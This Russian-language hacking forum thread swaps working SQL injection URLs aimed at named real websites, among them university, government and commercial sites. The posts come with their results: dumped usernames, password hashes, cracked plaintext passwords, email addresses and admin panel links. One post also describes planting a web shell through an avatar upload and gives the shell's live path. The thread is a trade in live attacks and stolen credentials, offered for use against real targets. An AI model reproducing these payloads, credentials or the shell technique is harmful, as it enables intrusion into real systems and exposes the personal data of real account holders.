SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Code:
    http://depts.washington.edu/asuwxpcl/instructors.php?id='-999999+union+select+1,concat(user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user+LIMIT+1,2/*
    Code:
    http://www.hastings.edu/igsbase/igstemplate.cfm?SRC=DB&SRCN=&GnavID=1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,25,26,27,28,29+from+mysql.user+LIMIT+1,6/*
    Code:
    http://texasextension.tamu.edu/agnews/index.php?id=1+union+select+1,concat(user,password,host),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user+LIMIT+13,13/*
    мои первые :)
     
    1 person likes this.
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.paradiz.nu/news.php?id=-1+union+select+1,2,concat(login,0x3a,password,0x3a),4+from+u57027_3.fs_admin+limit+0,10/*

    login: admin
    pass: maximus

    http://www.paradiz.nu/admin

    Зы: админка не фурычит - может обманка, или тупо не рабочая.
     
  3. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    kubu:freedom
    http://microhydropower.net/user/login_page.php админка
    но шел залить ни как не удасцо (
    и админка много не даст всё идет через mysql
    надеюсь на респект )
     
    2 people like this.
  4. Cmucl

    Cmucl Member

    Joined:
    21 Jun 2008
    Messages:
    12
    Likes Received:
    8
    Reputations:
    0
    http://www.openworld.gov/

    PR - 6

    http://www.openworld.gov/news/print.php?id=215&lang=2 - Путь к уязвимому скрипту

    Первых 5 записей форума

    [1]:anonymous:
    [2]:bbadmin:93dc6603a409188be197bde54e543056
    [3]:A.Natasha:084301fc1b042b1397edb06d1a7c9125
    [4]:Âîëêîâ Àëåêñåé:3d863b367aa379f71c7afc0c9cdca41d
    [5]:Olga Gornovaya:a122c630d4ac882086a70604dfd43c9e


    Первых 5 записей системных юзеров

    [1]:vadim:046d0f41a5d82dc559978d127488f339:[email protected]
    [2]:eek:lga:df5ee863b0a8ed6114bed2afa3440a9d:eek:[email protected]
    [3]:boukel:1fe1985be591afb061dee0857b6a4f47:[email protected]
    [4]:mbuhar:e89c7fb2900fec2c35d3a056160cbe80:[email protected]
    [5]:Britta:a15bb2bcc715bbd968f5bae3efae67c4:[email protected]
     
    3 people like this.
  5. N1K70

    N1K70 Banned

    Joined:
    2 Jan 2008
    Messages:
    161
    Likes Received:
    76
    Reputations:
    21
    http://www.openworld.gov/phpMyAdmin/
     
    1 person likes this.
  6. N1K70

    N1K70 Banned

    Joined:
    2 Jan 2008
    Messages:
    161
    Likes Received:
    76
    Reputations:
    21
    Code:
    http://www.german-tigers.de/Quiz/phptest-0.6.3/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/*
    Code:
    admin::07428b233f457aa2
    Code:
    inurl:"powered by phptest 0.6.3"

    Code:
    http://www.et2d.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*
    Code:
    15aa7b432c7f74b11c332b8d60672cc4:Muhammad
    Code:
    inurl:"powered by Live Music Plus"
     
    #6046 N1K70, 26 Jul 2008
    Last edited: 26 Jul 2008
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.justinian.com.ua/album.php?cat=2+union+select+concat_ws(0x3a,ID,Login,Passw),2,3,4,5,6+from+authUser/*

    Админка: www.justinian.com.ua/admin

    Login: ups
    Password: alladin

    помимо скулей и xss,есть баг с zend engine hashes,а так же раскрытие путей,имён таблиц с колонками и т.д. и т.п... Баг на баге).У кого получится залить шелл пишите xDDD.

    http://www.soaw.org/pressrelease.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13+from+phpsp_users--

    Таблицы - account, phpsp_users

    http://www.kafedra.com.ua/modules/articles/article.php?id=328+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

    http://www.kafedra.com.ua/modules/articles/article.php?id=328+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+1,1--



    Table: xoops_users

    Virgo-vlad:46f227e9cf17e2e1e88b14e679047bd9:252525
    andron_AS:123e24289c7434008bec6b61ab8f100a:looper
    Barulya:7a4ff1d33e92f1b8e33b8bbb6daf08c6:kos1981
    Belle:e76d56e405d994722ac98d9966146010:ghjcnjnfr
    Bolt:ba3a02ac8d369c6747c0007368b98500:fkut,hf
    chirik:f6c5fe9e207a16fb771e2231a9f30851:231276
    crazyman:3e0e92b5dd80c25494d58cac262193fd

    Table: user

    S Maxim S:4e3acf83f4228b1ca16b7579baa82156
    Segoktuhf:0be8ec195a5680fc5fb23848a18e63ba
    Pindukled:1a840b31bd4fdf0d7ebfd7188474e997
    ruslibrary:e60d4769b08ffc474fa7e53b995b8e4d


    Table: ibf_members

    automart:0fd4124daf45355c946a2d040ca286e2
    password: dallas22

    Tolstiy:b3b4d2dbedc99fe843fd3dedb02f086f
    password: 1981

    chirik:f6c5fe9e207a16fb771e2231a9f30851
    password: 231276
    sergsava: qwert
     
    2 people like this.
  8. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.mylover.ru/?mode=rating&rating_id=1&pid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(login,0x3a,pswd,0x3a,type),14,15,16,17,18,19,20,21,22,23,24,25,26+from+mylover_data.members+limit+20,29/*&mark=4

    superkrasa::tufundenda

    Есть phpmyadmin, но аутентификация не через бд.
     
    1 person likes this.
  9. N1K70

    N1K70 Banned

    Joined:
    2 Jan 2008
    Messages:
    161
    Likes Received:
    76
    Reputations:
    21
    бажный скрипт_1:
    Code:
    http://webmuseum.mit.edu/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
    бажный скрипт_2:
    Code:
    http://webmuseum.mit.edu/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/*
    1:[email protected]:6416d795663220752ae6f7edc19c87bd:Y

    ;))
     
    3 people like this.
  10. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    smart.ru
    Code:
    http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'%20AND%201=@@version--
    Code:
    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    таблы
    Code:
    http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('')))--
    xaction
    Дальше
    Code:
    http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('xaction')))--
    syssegments
    Патом
    Code:
    http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('xaction','syssegments')))--
    sysconstraints

    Ну чё я рассказываю, кому надо, поймут :)
     
    5 people like this.
  11. Bonnie and Clyde

    Bonnie and Clyde New Member

    Joined:
    26 Jul 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    2
    РусьЕдиная.ру
    Code:
    http://russedina.ru/frontend/heading/economy?id=-999999+union+select+concat(name,0x3a,password),2,3+from+users/*
    uralsJK3:uralsJKL
     
    2 people like this.
  12. Bonnie and Clyde

    Bonnie and Clyde New Member

    Joined:
    26 Jul 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    2
    Агенство бизнес новостей // ТИЦ=2600 PR=6
    Code:
    http://www.abnews.ru/index.php?p=sudi_pravo_i_armiya&news=-999999999+union+select+1,2,3,4/*
    Queen and Paul Rodgers - Homepage // ТИЦ=30 PR=5
    Code:
    http://www.queenpluspaulrodgers.com/index.php?news_id=-999999999+union+select+1,2,3,4,5,6,7,8/* 
    Ассоциация Практикующих Ветеринарных Врачей // ТИЦ=40 PR=5
    Code:
    http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    ОАО «Стеклозавод «НЕМАН» // ТИЦ=110 PR=3
    Code:
    http://www.neman.by/ru/index.php?news_id=-999999999+union+select+1/*
     
    2 people like this.
  13. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.dunloptyres.ru/tyre.php?id=-1+union+select+1,unhex(hex(concat(login,0x3a,password)))+from+partners+limit+1,1/*,:yes:

    Login: DUN-OPT
    Pass: 24DUN76df

    Открытый пас, бесполезный сайт.
     
    1 person likes this.
  14. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    _http://www.hlbs.co.uk/type.php?id=19+union+select+1,2,3,4/*
    _http://www.tgfs.com.au/type.php?no=2+union+select+1,2,3,4,5,6,7/*
    _http://www.recipe.ru/docs/nd/type.php?id=3+union+select+1,2,3,4,5,6,7,8/*
    _http://www.danaeco.ru/addinfo/catalog/type.php?id=-9+union+select+1,2,3,4,5,6,7,8/*

    _http://www.burgessbeds.co.uk/product/type.php?id=-7+union+select+1,2,user(),4,5,6,7,8/*
    version() - 4.0.30-log
    user() - [email protected]
    database() - u10042967

    _http://alumni.yale.edu/aya/blueprint/type.php?id=-3+union+select+1,2,3,4,5,user()/*
    version() - 4.1.20
    user() - bp2005@localhost
    database() - bpdb2
     
  15. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.sibgastroli.ru/?content=shownews&id=-1+union+select+1,2,3,4,concat(psw,0x3a,user),name,7,8,9,10,11,12+from+forum_users+limit+0,10/*

    login: alone_hunter
    password: bear

    Выборка по юзерам форума.

    Зы: Таких программистов нужно е**ть в сраку =)(Отдавать неграм на растерзание)
    Через upload аватара закачивается все что угодно душе =)

    Наш выбор madshell.php =)

    http://sibgastroli.ru/_images/users/alone_hunter.php


    Можно покопаться в корне freebsd'шки агавовского хостинга =)
     
    3 people like this.
  16. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Забыл: 842637 это пас админа, superadmin! это его же логин.

    http://sibgastroli.ru/admin - соответственно админка.
     
  17. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Code:
    http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables/*
    TABLES:
    aqualung:e05cbba9cd092521901a26346a0e5f3f
    то есть можно залить шелл через админку если хэш крякнуть
    ------
    Есть админка:
    таблица user:
    root:zakryto_cossa
    kot:kot

    Я как рут увидал сразу понял куда впихать этот пасс
    _http://www.rsava.org/admin/
    ------
    Турецкий хекер уже задефейсил(то есть через день,вот падальщики )))
     
    #6057 DDoSька, 28 Jul 2008
    Last edited: 28 Jul 2008
    4 people like this.
  18. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    fat-cat.co.uk

    Code:
    http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,id,username,password,email),3,4,5,6,7+FROM+users%20where%20id=2/*
    
    Таблица users:
    Code:
    2iwantiwantiwantSeiji25x[email protected]
    3alex_teagundam[email protected]
    ......................................................................
    ......................................................................
    1442chuppethxq92EAA932[email protected]
    1443FemyanaehoowngIPouCm641[email protected]
    
    хеш текушева пользователя mysql.user и вывод file_priv
    Code:
    http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,file_priv,user,password),3,4,5,6,7+from+mysql.user where user=left(user(),locate(0x40,user())-1)/
    
    file_priv нет
    Code:
    Nfatcat*B4DE6388421C75A631A6BADDCC27DAEE58D0122A
    
    sublackwell.co.uk
    Code:
    http://www.sublackwell.co.uk/gallery.php?id=2+and+substring(version(),1,1)=5--
    
    Mysql 5 версии таблиц интересных не нашел (
     
    1 person likes this.
  19. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    http://moldagrotehnica.md

    user() = agro@localhost
    version() = 4.1.14
    database() = moldagrotehnica_md

    http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,4/**/from/**/glt_voting_result/**/limit/**/1,1/*

    http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,count(*)/**/from/**/glt_users/**/limit/**/0,1/*

    count(*) from glt_users = 5

    узнал названия и префикс таблиц когда отправил данные в vote.php
    Query INSERT INTO `glt_voting_result` failed

    админка на первой странице .. но не смог подобрать поля в базе
     
    2 people like this.
  20. N1K70

    N1K70 Banned

    Joined:
    2 Jan 2008
    Messages:
    161
    Likes Received:
    76
    Reputations:
    21
    Code:
    http://www.pioneerhall.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
    user - pioneer_mainU@localhost
    database - 5.0.51a-
    version - pioneer_main
    =\
     
    1 person likes this.
Thread Status:
Not open for further replies.